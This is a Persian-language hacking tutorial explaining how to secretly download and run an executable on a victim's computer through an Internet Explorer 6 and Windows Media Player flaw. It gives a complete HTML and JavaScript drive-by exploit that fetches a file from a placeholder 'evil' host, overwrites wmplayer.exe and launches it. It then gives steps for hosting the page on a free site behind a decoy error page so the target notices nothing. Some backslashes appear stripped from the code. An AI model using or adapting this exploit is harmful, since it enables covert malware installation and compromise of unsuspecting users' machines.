بدونه اینکه کسی متوجه بشه رو سیستم فایل اجرا بکنید
فرستادن و اجرای مخفی یک فایل اجرایی در کامپيوتر
با روشي كه توضيخ خواهم داد شما مي توانيد از طريق يك سايت فايلي را در كامپيوتر هدف خود دانلود و سپس اجرا كنيد! راه نفوذ اين روش از طريق سر ريز شدن اينترنت اكسپلورر 6 و مديا پلير هست
.1. يك فايل با پسوند HTML تشكيل دهيد و كد زير را در آن قرار دهيد:
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://YourHost.com/YourEvilFile.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:Program FilesWindows Media Playerwmplayer.exe",2);
location.href = "mms://";
</textarea>
Wait a couple of seconds..
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/ /);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"'");
line = line.replace(/[]/g,"\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'rn';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
اگر هدف شما مديا پلير را در شاخه يا داريوي غير از C:Program FilesWindows Media Playerwmplayer.exe نصب كرده است اين قسمت را نيز تغيير دهيد.
2. يك فايل ديگر با نام error.jsp تشكيل دهيد و داخل آن هر كد html كه مي خواهيد قرار دهيد. چون هدف شما در هنگام دانلود و اجرا شدن فايل صفحه درون فايل error.jsp را مي بيند.
3. حالا فايل html و error.jsp را در يك شاخه روي يك فضا رايگاني كه از يك سرور مثل http://www.angelfire.com گرفته ايد آپ لود كنيد.
4. از فايل اجرايي مديا پلير خود wmplayer.exe يك كپي تهيه كنيد چون احتمال دارد خراب شود
5. وارد صفحه html كه ساخته بوديد از طريق اينترنت اكسپلورر شويد. مثلا http://www.angelfire.com/youaccoundname/index.html
6. فايل بدون هيچ اخطاري دانلود شده و بجاي فايل اجرايي مديا پلير ميشيند و سپس اجرا مي شود
